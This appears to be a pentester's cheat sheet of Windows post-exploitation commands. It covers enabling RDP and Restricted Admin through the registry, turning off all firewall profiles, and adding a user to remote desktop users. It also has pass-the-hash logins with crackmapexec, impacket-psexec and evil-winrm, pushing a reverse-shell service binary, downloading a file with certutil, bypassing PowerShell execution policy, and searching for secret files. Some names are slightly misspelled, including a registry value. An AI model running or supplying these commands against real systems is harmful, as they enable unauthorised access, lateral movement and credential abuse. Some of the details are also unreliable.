Collection of Useful Commands - Windows

Enable RDP and Add user

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnection /t REG_DWORD /d 0 /f
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
netsh advfirewall set allprofiles state off
net localgroup "remote desktop users" <username> /add

Crackmapexec

crackmapexec smb <ip/ip-range> -u <username> -H <ntlm> [-p <password>] -d <domain> --continue-on-success [--local-auth] [--lsa]

PowerView.ps1

Check github harmj0y powerview

import-module .\PowerView.ps1
Get-DomainUser -SPN
Get-DomainComputer
Get-ForestTrust -Forest "<domain>"

impacket

impacket-psexec <domain>/<username>@<ip> -hashes ':<hash>'
impacket-psexec '<domain/client>/<username>'@<ip> -hashes ':<hash>'

# some_evshell.svc.exe is generated with msfvemon -f exe-service
impacket-psexec <domain>/<username>@<ip> -hashes ':<hash>' -remote-binary-name <some_revshell.svc.exe>

certutil

certutil -urlcache -split -f <url> <C:\file>

evil-winrm

evil-winrm -i <ip> -u <username> -H <ntlm>

powershell

# bypass the execution policy
powershell -ep bypass 

# Search for a file
Get-Childitem –Path C:\ -Include *network-secret* -Recurse -ErrorAction SilentlyContinue`